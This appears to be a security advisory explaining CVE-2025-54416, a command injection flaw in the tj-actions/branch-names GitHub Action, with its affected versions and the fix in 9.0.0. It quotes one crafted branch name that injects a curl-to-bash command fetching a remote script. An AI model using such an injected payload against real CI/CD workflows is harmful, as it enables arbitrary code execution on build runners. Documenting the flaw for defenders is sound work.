Introduction
A single malicious branch name can compromise an entire CI/CD pipeline if not properly sanitized. That is exactly what happened with tj-actions/branch-names, a popular GitHub Action used to extract branch and tag names in automated workflows. This vulnerability, tracked as CVE-2025-54416, enables arbitrary command execution in any workflow that consumes its output from versions 8.2.1 and below. With a CVSS score of 9.1, the risk is significant for any project relying on this action in collaborative or open environments.
About tj-actions/branch-names:
tj-actions is a GitHub organization that maintains a suite of workflow automation tools for GitHub Actions. The branch-names action is widely used in open-source and enterprise CI/CD pipelines to programmatically retrieve branch and tag names across all GitHub event types. Its popularity stems from its flexibility and ease of integration, making it a common dependency in many DevOps workflows.
Technical Information
CVE-2025-54416 is a command injection vulnerability resulting from improper input sanitization and unescaped output in the tj-actions/branch-names GitHub Action. The flaw occurs when branch or tag names containing shell metacharacters are not properly neutralized before being passed to downstream workflow steps. Attackers can exploit this by crafting branch or tag names that inject arbitrary shell commands into the workflow execution context.
The vulnerability specifically affects how the action exposes branch and tag names via its outputs. If a workflow step uses these outputs directly in a shell command, a maliciously crafted branch name can break out of the expected context and execute arbitrary commands. For example, a branch name such as:
"test") ${IFS} && {curl -sSfL gist.githubusercontent.com/[MALICIOUS-CONTENT].sh } | bash && echo "foo"
When this branch name is processed by the vulnerable action and used in a shell context, the injected commands are executed with the permissions of the workflow runner. The root cause is the lack of proper escaping and sanitization of user-controlled input, which is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command). The issue was addressed in version 9.0.0, which implements stricter output escaping and input validation.
Affected Systems and Versions
The vulnerability affects tj-actions/branch-names versions 8.2.1 and below. Any workflow that uses these versions and consumes branch or tag names as shell variables or command arguments is at risk, especially in repositories that accept contributions from untrusted users or external collaborators. The issue is fixed in version 9.0.0 and later.
Vendor Security History
tj-actions has responded to this vulnerability by releasing a fix in version 9.0.0 and publishing a detailed security advisory. No prior similar vulnerabilities were found in the public record for this action. The vendor's patch response was prompt following disclosure.